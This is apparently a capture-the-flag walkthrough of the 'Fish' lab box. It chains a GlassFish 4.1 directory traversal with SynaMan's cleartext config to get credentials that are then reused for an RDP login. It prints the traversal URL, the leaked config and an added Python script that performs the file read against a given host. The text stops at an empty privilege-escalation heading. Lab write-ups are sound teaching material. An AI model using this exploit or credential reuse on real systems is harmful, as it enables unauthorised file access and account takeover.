
PG: Fish | Walkthrough

October 29, 2021
2 min read
TL;DR
  • Credential Disclosure through LFI
  • Privilege Escalation through a vulnerable installation of TotalAV

Enumeration

Nmap

PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: FISHYYY
| NetBIOS_Domain_Name: FISHYYY
| NetBIOS_Computer_Name: FISHYYY
| DNS_Domain_Name: Fishyyy
| DNS_Computer_Name: Fishyyy
| Product_Version: 10.0.19041
|_ System_Time: 2021-10-29T14:19:40+00:00
|_ssl-date: 2021-10-29T14:19:58+00:00; -27d15h33m01s from scanner time.
| ssl-cert: Subject: commonName=Fishyyy
| Not valid before: 2021-10-27T11:48:08
|_Not valid after: 2022-04-28T11:48:08
3700/tcp open giop CORBA naming service
3820/tcp open ssl/giop CORBA naming service
| ssl-cert: Subject: commonName=localhost/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US
| Not valid before: 2014-08-21T13:30:10
|_Not valid after: 2024-08-18T13:30:10
|_ssl-date: TLS randomness does not represent time
3920/tcp open ssl/exasoftport1?
| ssl-cert: Subject: commonName=localhost/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US
| Not valid before: 2014-08-21T13:30:10
|_Not valid after: 2024-08-18T13:30:10
|_ssl-date: TLS randomness does not represent time
4848/tcp open http Sun GlassFish Open Source Edition 4.1
|_http-title: Login
6060/tcp open http Synametrics Web Server 7 (Syncrify)
|_http-server-header: Synametrics Web Server v7
|_http-title: Site doesn't have a title (text/html).
7676/tcp open java-message-service Java Message Service 301
8080/tcp open http Sun GlassFish Open Source Edition 4.1
|_http-title: Data Web
| http-methods:
|_ Potentially risky methods: PUT DELETE TRACE
8181/tcp open ssl/http Sun GlassFish Open Source Edition 4.1
|_ssl-date: TLS randomness does not represent time
| http-methods:
|_ Potentially risky methods: PUT DELETE TRACE
| ssl-cert: Subject: commonName=localhost/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US
| Not valid before: 2014-08-21T13:30:10
|_Not valid after: 2024-08-18T13:30:10
|_http-title: Data Web
8686/tcp open java-rmi Java RMI
| rmi-dumpregistry:
| Fishyyy/7676/jmxrmi
| javax.management.remote.rmi.RMIServerImpl_Stub
| @169.254.10.3:49712
| extends
| java.rmi.server.RemoteStub
| extends
| java.rmi.server.RemoteObject
| jmxrmi
| javax.management.remote.rmi.RMIServerImpl_Stub
| @169.254.10.3:8686
| extends
| java.rmi.server.RemoteStub
| extends
|_ java.rmi.server.RemoteObject
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -27d15h33m01s, deviation: 0s, median: -27d15h33m01s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.37 seconds

Searching the service versions Nmap reported turns up two public advisories that chain together:

Port 6060: SynaMan - v4.0: Credential Disclosure | exploit-db
SynaMan keeps its SMTP account, password included and in cleartext, in config/AppConfig.xml under its installation directory. That file is only useful if something lets us read it from disk.

Port 4848: GlassFish Server 4.1: LFI | exploit-db
The GlassFish 4.1 admin listener has an unauthenticated directory traversal (CVE-2017-1000028): an overlong UTF-8 encoding of "/" (%c0%af) is not treated as a path separator by the traversal check but is decoded as one afterwards, so any file the GlassFish service account can read is retrievable. The walkthrough labels it LFI; strictly it is an arbitrary file read, which discloses contents but does not execute them. Combined, the two give the SynaMan SMTP credential without ever logging in.

Exploitation

Initial Access

Credential Disclosure through LFI

Twelve "..%c0%af" steps from /theme/META-INF/prototype climb out of the GlassFish theme directory to the root of the drive; from there SynaMan's configuration file is requested by its on-disk path:

http://192.168.193.168:4848//theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afsynaman/config/AppConfig.xml

The server returns the file as stored on disk:
<Configuration>
<parameters>
<parameter name="adminEmail" type="1" value="admin@fish.pg"/>
<parameter name="smtpSecurity" type="1" value="None"/>
<parameter name="jvmPath" type="1" value="jre/bin/java"/>
<parameter name="userHomeRoot" type="1" value="C:\ProgramData\SynaManHome"/>
<parameter name="httpPortSSL" type="2" value="-1"/>
<parameter name="vmParams" type="1" value="-Xmx128m -DLoggingConfigFile=logconfig.xml"/>
<parameter name="httpPort" type="2" value="0"/>
<parameter name="synametricsUrl" type="1" value="http://synametrics.com/SynametricsWebApp/"/>
<parameter name="lastSelectedTab" type="1" value="1"/>
<parameter name="emailServerWebServicePort" type="2" value=""/>
<parameter name="imagePath" type="1" value="images/"/>
<parameter name="publicIPForUrl" type="1" value=""/>
<parameter name="defaultOperation" type="1" value="frontPage"/>
<parameter name="httpPort2" type="2" value="6060"/>
<parameter name="useUPnP" type="4" value="true"/>
<parameter name="smtpServer" type="1" value="mail.fish.pg"/>
<parameter name="smtpUser" type="1" value="arthur"/>
<parameter name="InitialSetupComplete" type="4" value="true"/>
<parameter name="failureOverHttpPort" type="2" value="55222"/>
<parameter name="disableCsrfPrevention" type="4" value="true"/>
<parameter name="httpIP" type="1" value=""/>
<parameter name="smtpPort" type="2" value="25"/>
<parameter name="emailServerWebServiceHost" type="1" value=""/>
<parameter name="smtpPassword" type="1" value="KingOfAtlantis"/>
<parameter name="ntServiceCommand" type="1" value="net start SynaMan"/>
<parameter name="mimicHtmlFiles" type="4" value="false"/>
</parameters>
</Configuration>
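Added example (not part of the original walkthrough, nor of GlassFish or SynaMan): a small script that builds the overlong-UTF-8 traversal path for the GlassFish theme prefix used above and pulls the SMTP account out of a SynaMan AppConfig.xml. The /theme/META-INF/prototype prefix, the %c0%af trick and the synaman/config/AppConfig.xml target are taken from the request above; the traversal depth of 12, the use of a single slash after the port (the original request had two) and the embedded sample XML (a trimmed copy of the response above, constructed for offline use) are assumptions.

```python
"""Read SynaMan's AppConfig.xml through the GlassFish 4.1 traversal and list the
credentials it contains. Added example, not code from the walkthrough."""
import sys
import urllib.request
import xml.etree.ElementTree as ET

# GlassFish 4.1 serves theme resources from this prefix; the traversal is
# appended after "prototype", as in the request shown in the walkthrough.
THEME_PREFIX = "/theme/META-INF/prototype"

# %c0%af is an overlong (non-shortest-form) UTF-8 encoding of "/" (0x2F).
# A conforming decoder rejects it, so a traversal check looking for "../"
# does not see a separator, while the server's later decode turns it into
# one. "..%c0%af" therefore climbs one directory per repetition.
OVERLONG_SLASH = "%c0%af"


def build_traversal_path(target: str, depth: int = 12) -> str:
    """Return the request path that reads `target`, relative to the drive root.

    depth=12 is an assumption: it is what the walkthrough's request used and is
    more than enough to reach C:\\ from the GlassFish theme directory.
    """
    climb = (OVERLONG_SLASH + "..") * depth
    return THEME_PREFIX + climb + OVERLONG_SLASH + target.lstrip("/")


def parse_synaman_config(xml_text: str) -> dict:
    """Flatten the <parameter name=... value=.../> list into a name -> value dict."""
    root = ET.fromstring(xml_text)
    return {p.get("name"): p.get("value") for p in root.iter("parameter")}


def extract_credentials(xml_text: str) -> dict:
    """Return the secrets worth reusing, plus two weak settings worth noting."""
    params = parse_synaman_config(xml_text)
    wanted = ("smtpServer", "smtpUser", "smtpPassword", "adminEmail",
              "disableCsrfPrevention", "httpPort2")
    return {k: params[k] for k in wanted if k in params}


def fetch_config(base_url: str, target: str = "synaman/config/AppConfig.xml",
                 depth: int = 12, timeout: int = 10) -> str:
    """GET the traversal URL. urllib sends the %c0%af bytes through unchanged,
    which matters: a client that normalises or re-encodes the path breaks the trick."""
    url = base_url.rstrip("/") + build_traversal_path(target, depth)
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Constructed sample: a trimmed copy of the AppConfig.xml shown in the walkthrough,
# embedded so the parser can be exercised without a target.
SAMPLE_CONFIG = """<Configuration>
<parameters>
<parameter name="adminEmail" type="1" value="admin@fish.pg"/>
<parameter name="httpPort2" type="2" value="6060"/>
<parameter name="smtpServer" type="1" value="mail.fish.pg"/>
<parameter name="smtpUser" type="1" value="arthur"/>
<parameter name="disableCsrfPrevention" type="4" value="true"/>
<parameter name="smtpPassword" type="1" value="KingOfAtlantis"/>
</parameters>
</Configuration>"""


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # e.g. python3 synaman_creds.py http://192.168.193.168:4848 (assumed host/port)
        xml_text = fetch_config(sys.argv[1])
    else:
        xml_text = SAMPLE_CONFIG
    for name, value in extract_credentials(xml_text).items():
        print(f"{name:24} {value}")
```

Run with no arguments it parses the embedded sample; with a base URL it performs the actual read. The parser deliberately returns disableCsrfPrevention and httpPort2 alongside the SMTP account: the first tells you SynaMan's own web interface on 6060 accepts cross-site requests, the second confirms which port that interface is on.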

The SMTP password is stored in cleartext and, as is common, the same account name and password have been reused for a local Windows login. With RDP exposed on 3389, arthur:KingOfAtlantis gives an interactive session on the target:

$ rdesktop -u arthur -p "KingOfAtlantis" $ip -g 90%

Privilege Escalation

TotalAV Privilege Escalation